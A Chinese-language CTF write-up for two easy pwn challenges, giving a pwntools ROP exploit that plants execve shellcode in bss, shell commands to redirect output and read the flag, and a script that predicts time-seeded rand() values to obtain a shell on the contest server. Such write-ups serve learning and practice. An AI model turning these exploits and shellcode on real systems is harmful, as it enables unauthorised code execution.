HITCTF_WP_pwn4_5

pwn的两题签到

dagongren1

这题其实真的就很简单,查了一下保护全关。

思路就是往bss段里写个shellcode然后再调用就好了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#!usr/bin/env python
# -*- coding:utf-8 -*-
 
from pwn import *
context(arch = 'amd64', os = 'linux')
context.log_level ='DEBUG'
p=process('./dagongren1')
# p = remote('81.70.209.171',50201)
elf = ELF('./dagongren1')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')



p.recvuntil('Come On')

p.sendline('a'*0x20+p64(0)+p64(0x0400737)+p64(0x04006D6))
# gdb.attach(p)


pop_rdi_ret = 0x0000000000400813
bss = 0x000000000600C40
pop_rsi_r15_ret = 0x0000000000400811
ss = 0x00000000040088B
scanf_plt = 0x0000000004005D0
py = ''
py += 'a'*0x20
py += p64(0xdeadbeef)
py += p64(pop_rdi_ret)
py += p64(ss)
py += p64(pop_rsi_r15_ret)
py += p64(bss+0x300)
py += p64(0)
py += p64(scanf_plt)
py += p64(bss+0x300)
# shellcode = asm(shellcraft.sh())
shellcode='\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x2e\x63\x68\x6f\x2e\x72\x69\x01\x48\x31\x04\x24\x48\x89\xe7\x31\xd2\x31\xf6\x6a\x3b\x58\x0f\x05'
p.sendline(py)

sleep(0.1)
p.sendline(shellcode)
p.interactive()

由于是关闭了输出流的,所以交互之后啥也看不到(本地还会报错)

1
2
exec /bin/sh 1>&0  //可以重定向输出
cat flag>&0  //可以直接输出flag

lucky

这题我觉得比较像misc
就纯拿time当种子,然后猜随机数。就多写一个c就好了,编译之后两边调用,然后比较,就能getshell

time.cpp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#include<iostream>
#include<time.h>
#include <cstdlib>
using namespace std;

int main(){
	unsigned int time_rand;
	unsigned int rand_num;
	int a;
	int b;
	time_rand = (unsigned int)time(0LL) / 0xA;
	cout << time_rand<<endl;
	srand(time_rand+1);
	int i =0;
	do{
		cin >> b;
		if(b==1){
			a=rand();
			cout<<hex<<a<<endl;
		}
		i++;
	}while(1);
}

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#!usr/bin/env python
# -*- coding:utf-8 -*-
 
from pwn import *
import time
import random
context(arch = 'amd64', os = 'linux')
context.log_level ='DEBUG'

# p=process('./lucky')
p=remote('81.70.209.171',51200)
p.recvuntil('enter your name,lucky guy')
p.sendline('0')


c=process('./time')
c.recvuntil('\n')


a=[0]*100
for i in range(100):
	c.sendline("1")
	a[i] = int(c.recvuntil("\n")[:-1],16)
	# print a[i]
	p.recvuntil('Come and Guess the number:')
	p.sendline(str(a[i]))




p.interactive()

真的是太菜了,pwn只能打出两题签到。多谢密码大佬带飞